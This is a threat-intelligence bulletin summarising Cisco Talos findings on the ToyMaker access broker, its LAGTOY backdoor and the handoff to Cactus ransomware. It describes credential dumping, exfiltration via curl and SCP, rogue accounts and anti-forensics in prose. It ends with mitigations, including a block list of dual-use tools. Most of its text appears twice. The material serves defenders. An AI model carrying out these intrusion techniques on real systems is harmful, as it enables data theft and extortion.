Introducing Toymaker, an Initial Access Broker Working In Cahoots With Double Extortion Gangs
Summary:
In 2023, Cisco Talos uncovered a sophisticated compromise within a critical infrastructure enterprise, orchestrated by a blend of threat actors operating in a staged intrusion. Initial access was brokered by a financially motivated actor dubbed ToyMaker, who exploited vulnerable internet-facing systems to deploy a custom backdoor named LAGTOY. This implant enabled credential harvesting, remote command execution, and the establishment of persistent access through reverse shells. Within days, ToyMaker executed early-stage reconnaissance, created fake admin accounts, and used memory dumping tools like Magnet RAM Capture to extract credentials, later archived and exfiltrated using tools like 7-Zip and PuTTY’s SCP utility.
After a three-week lull, access was passed to the Cactus ransomware group, marking a transition from access facilitation to full-blown exploitation. Cactus employed a distinct set of tools and TTPs to perform network enumeration, file archiving, and data exfiltration, ultimately culminating in double extortion attacks. They deployed remote management utilities such as eHorus, AnyDesk, RMS, and OpenSSH, with persistence maintained via scheduled tasks and Metasploit-generated binaries communicating with actor-controlled infrastructure. Cactus also executed privilege escalation and anti-forensics measures by removing SSH keys, clearing logs, and modifying file permissions.
LAGTOY, Talos’s name for ToyMaker’s backdoor, functioned as a system service ("WmiPrvSV") and communicated with its hardcoded command-and-control server using raw socket connections on TCP port 443, eschewing TLS encryption. It executed commands sent from the C2, including administrative tasks and custom instructions, using unique time-based logic to determine execution frequency and sleep intervals. Anti-debugging techniques were built into its execution logic to evade detection during forensic analysis.
Security Officer Comments:
Cactus’s use of the access provided by ToyMaker was highly methodical. They exfiltrated sensitive data by compressing files with 7-Zip and transferring them over curl to remote servers. They further covered their tracks by deleting registry keys, clearing RDP history, and removing persistence mechanisms. On several systems, Cactus created unauthorized user accounts like “whiteninja” to facilitate automated logins and likely ransomware deployment. They also rebooted systems into Safe Mode to bypass endpoint protection mechanisms.
Talos concludes that ToyMaker operated as an Initial Access Broker (IAB), not involved in the monetization phase but crucial for initial infiltration and credential theft. The clear handoff of access and divergence in techniques between ToyMaker and Cactus highlights the need to model such interconnected threats as discrete yet related entities. Cisco Talos emphasizes incorporating these access handover dynamics into future threat modeling paradigms, noting that ToyMaker’s tooling and behavior align closely with financially motivated IAB profiles.
Suggested Corrections:
IOCs:
https://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/
Link(s):
https://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/
In 2023, Cisco Talos uncovered a sophisticated compromise within a critical infrastructure enterprise, orchestrated by a blend of threat actors operating in a staged intrusion. Initial access was brokered by a financially motivated actor dubbed ToyMaker, who exploited vulnerable internet-facing systems to deploy a custom backdoor named LAGTOY. This implant enabled credential harvesting, remote command execution, and the establishment of persistent access through reverse shells. Within days, ToyMaker executed early-stage reconnaissance, created fake admin accounts, and used memory dumping tools like Magnet RAM Capture to extract credentials, later archived and exfiltrated using tools like 7-Zip and PuTTY’s SCP utility.
After a three-week lull, access was passed to the Cactus ransomware group, marking a transition from access facilitation to full-blown exploitation. Cactus employed a distinct set of tools and TTPs to perform network enumeration, file archiving, and data exfiltration, ultimately culminating in double extortion attacks. They deployed remote management utilities such as eHorus, AnyDesk, RMS, and OpenSSH, with persistence maintained via scheduled tasks and Metasploit-generated binaries communicating with actor-controlled infrastructure. Cactus also executed privilege escalation and anti-forensics measures by removing SSH keys, clearing logs, and modifying file permissions.
LAGTOY, Talos’s name for ToyMaker’s backdoor, functioned as a system service ("WmiPrvSV") and communicated with its hardcoded command-and-control server using raw socket connections on TCP port 443, eschewing TLS encryption. It executed commands sent from the C2, including administrative tasks and custom instructions, using unique time-based logic to determine execution frequency and sleep intervals. Anti-debugging techniques were built into its execution logic to evade detection during forensic analysis.
Security Officer Comments:
Cactus’s use of the access provided by ToyMaker was highly methodical. They exfiltrated sensitive data by compressing files with 7-Zip and transferring them over curl to remote servers. They further covered their tracks by deleting registry keys, clearing RDP history, and removing persistence mechanisms. On several systems, Cactus created unauthorized user accounts like “whiteninja” to facilitate automated logins and likely ransomware deployment. They also rebooted systems into Safe Mode to bypass endpoint protection mechanisms.
Talos concludes that ToyMaker operated as an Initial Access Broker (IAB), not involved in the monetization phase but crucial for initial infiltration and credential theft. The clear handoff of access and divergence in techniques between ToyMaker and Cactus highlights the need to model such interconnected threats as discrete yet related entities. Cisco Talos emphasizes incorporating these access handover dynamics into future threat modeling paradigms, noting that ToyMaker’s tooling and behavior align closely with financially motivated IAB profiles.
Suggested Corrections:
IOCs:
https://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/
- Secure Authentication: Enforce multi-factor authentication (MFA) on all remote access and privileged accounts. Regularly audit credentials and disable unused or stale accounts.
- Restrict Dual-Use Tools: Block or control the use of tools like AnyDesk, 7-Zip, curl, and PowerShell that attackers commonly exploit.
- Patch & Harden External Assets: Patch internet-facing systems quickly and scan regularly for exposed or vulnerable assets.
- Enhance Detection Capabilities: Use EDR to detect credential theft, lateral movement, and persistence techniques like Safe Mode reboots or shadow copy deletion.
Link(s):
https://blog.talosintelligence.com/introducing-toymaker-an-initial-access-broker/